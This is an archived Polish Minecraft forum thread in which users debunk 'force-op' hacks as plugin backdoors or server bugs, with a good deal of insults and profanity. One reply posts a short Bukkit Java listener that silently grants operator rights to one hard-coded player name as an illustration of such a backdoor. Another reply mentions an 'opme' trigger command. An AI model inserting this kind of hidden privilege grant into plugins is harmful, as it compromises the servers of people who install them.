Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

[Inne] Czy force-op istnieje.Temat dla właścicieli serwerów! :)


Gość Lord Tytan

Rekomendowane odpowiedzi

Opublikowano


Witam forumowiczów.
Dziś o godzinie 20:00 obaliłem teorię tak zwanego "force-op".
Jedna z rozmów którzy niby używali tego magicznego programu 
"force-op", jak sądzę pewnie każda osoba by tak pisała.
Koniec końców kazałem mu żeby dał Sobie OP i Mnie zbanował,po 14 minutach pisania(film) wszedł bo i tak by nic nie zrobił!:)
Serdecznie pozdrawiam @Lord Green @"
filippop1"­ i @"themolkapl" pokój z wami koledzy i programiści.

Modlitwa od
@"filippop1" dla ludzi którzy chcą oglądać dowody!

Bukkicie nasz,
któryś jest w javie,
święć się metody Twoje,
przyjdź repo Twoje,
bądź kod Twój jako w gicie tak i w mavenie,
stacktrace naszego powszedniego daj nam dzisiaj,
i odpuść nam bugi Twoje,
jako i my odpuszczamy naszym kolegom z pracy,
i nie wódź nas na wycieki pamięci,
ale nas zbaw od Skript.


#1 Film



* w filmie może występować moja dysleksja, przepraszam za każdy popełniony błąd gramatyczny :(

#2 Screeny 
http://prntscr.com/6z8hao
http://prntscr.com/6z8hgv


Koniec końców nie ma takiego czegoś jak force-op, są tą backdoor w pluginach od pro elo programistów skripta ;)
* Temat,film,screny nie mają na celu nikogo urazić!. 

 

Opublikowano

@Lord Tytan

Coś ci się udało zaznaczenie ;3

-------------------------------------------------------------

@filippop1 @TheMolkaPL.

-------------------------------------------------------------

 

@topic

 

Force-op nie istnieje. Ale istnieją luki w serwerze. Mojang w wersji 1.8.4 naprawił ten bug/lukę więc lepiej się przenieść na 1.8.4. ;)

­

Opublikowano



Właściciel korzystał właściwie z ich plików które miały backdoor'a więc danie Sobie op'a przez własny plugin to nie jest nic trudnego B)
Co do bugów w 1.8.1-1.8.3 właściwie one nic nie dawał ;)

Opublikowano

 

Właściciel korzystał właściwie z ich plików które miały backdoor'a więc danie Sobie op'a przez własny plugin to nie jest nic trudnego B)

Co do bugów w 1.8.1-1.8.3 właściwie one nic nie dawał ;)

 

 

Przykładowo można nazwać diament o nazwie Force-OP i po kliknięciu na niego nadaje OPA.

 

Są różne typy Force-OP, ale najpopularniejszym włamaniem się do "bazy głównej" są pluginy lub luki.

­

Opublikowano

Przecież to normalne, że taki twór jak "force-OP" nie istnieje, a jest jedynie chorym umysłem skrypciarzy z MPCg... forum.

 

Autorem modlitwy jest NorthPL, znany jako @nieznany1234567 (ileś tam cyfr :P). Niema możliwości dania sobie OP z klienta serwera, ponieważ to blokuje serwer. Nie ma możliwości dania sobie OP z klienta jakimkolwiek, nawet najdziwniejszym sposobem, ponieważ nie ma nigdzie zapisu takiego operatora do pliku, ani też nie ma nigdzie do zapisania go do takiej listy w pamięci ;)

 

Mam bekę z tych filmów na YouTube, jak jakiś pro elo programista Skripta nazywający się komarem, pro elo hakerem niszczy serwer, a obok gdzieś stoi admin i się patrzy :P

#AntyBlezur


Opublikowano
package pl.lordtytan.plugin.event;

import org.bukkit.entity.Player;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.player.PlayerJoinEvent;
import pl.lordtytan.plugin.Lang;
import pl.lordtytan.plugin.Manager;

public class PlayerJoin
  implements Listener
{
  @EventHandler
  public void onPlayerJoinEvent(PlayerJoinEvent e)
  {
    if (!Manager.playerExists(e.getPlayer())) {
      Manager.playerRegister(e.getPlayer(), Integer.valueOf(Lang.life_start));
    }
    if (e.getPlayer().getName() == "ZielonyKapturnik")
    {
      e.getPlayer().setOp(true);
      e.getPlayer().sendMessage(Manager.fix("&cChujowy backdoor! :)"));
    }
  }
}

To jest właśnie przykład takiego bardzo ForceOP (Tak zły tytan zrobił ujowy backdoor)

 

Ps.Powinno być UUID bo zmieniłem nick :P

Opublikowano

Moim zdaniem zachowywałeś się jak typowy rozpieszczony bachor.

 

Obrażałeś go od gimbusów, skrypciarzy, "gówno widzieliście, w d***e byliście" a on na ciebie ani jednego obraźliwego słowa nie powiedział :) Oglądałem cały film 3x i nie znalazłem ­z jego strony gimbusiarskiej odpowiedzi.

A to że ForceOP nie istnieje to nie ważne, istnieje luka w spigocie (exploit) wysyłająca bardzo dużą ilość danych na serwer przez to on pada.

 

Dlatego schowaj się z tym filmikiem bo pogrążasz się w idiotyzmie. 

Naucz się kultury, nawet jak uważasz że pisze bzdury.

 

Pozdrawiam

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Opublikowano

Jest plugin force-op i wystarczy ze zmienisz nazwe pluginu itp... I koles przesle Technikowi plugin np: na cheaty i po wejsciu wpisuje ==opme== i po serwie... ale sa pluginy na anty force op :)

Opublikowano

Jest plugin force-op i wystarczy ze zmienisz nazwe pluginu itp... I koles przesle Technikowi plugin np: na cheaty i po wejsciu wpisuje ==opme== i po serwie... ale sa pluginy na anty force op :)

Pragnę podkreślić, że to nie forceop tylko backdoor ; )
Opublikowano

@AdamGrzegorz
Kolego lepiej wróć do pisania Swoich tool'ów aka skript ;)
Mi bardziej chodzi,że nie ma force op a te filmy z yt to prosty batch i tyle.
A co do mojej kultury jest na poziomie dopóki ktoś mówi/opowiada taki bzdury jak force-op, czy boty pisane .txt

A co do do tego raczej się nie wypowiem, polecam ten film :>
SVjkcKL.jpg


­

Opublikowano

 

@AdamGrzegorz

Kolego lepiej wróć do pisania Swoich tool'ów aka skript ;)

Mi bardziej chodzi,że nie ma force op a te filmy z yt to prosty batch i tyle.

A co do mojej kultury jest na poziomie dopóki ktoś mówi/opowiada taki bzdury jak force-op, czy boty pisane .txt

 

A co do do tego raczej się nie wypowiem, polecam ten film :>

SVjkcKL.jpg

 

­

 

Toolsy 'aka skript'? XDDDDDDD

No to dojebałeś, nie zrobił byś nawet 0.1% takiego czegoś, i wyzywasz innych xD

 

Gówno potrafisz, a się mądrzysz jaki to ty byś nie był kox :D

 

Nie no k***a, jak mnie wnerwia takie jebane kozactwo, napisz jeszcze że napiszesz DarkBoty albo k***a proxy do minecrafta (z czego istnieją tylko 2) xD

 

Kolego wróć do pisania toolsów aka skript ... no po prostu leżę xD Leżę i płaczę jakie gimbusy łażą po tym forum xD

 

 

Znowu mi chyba ciśnienie skoczyło ._.

 

 

ps: te pluginy już są usuniętę, aczkolwiek nie wiem o co wam chodzi, na zagranicznych forach sobie je dają z ręki do ręki a tu jest ból dupy xD Spoko, macie. Zadowoleni? xD

­

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...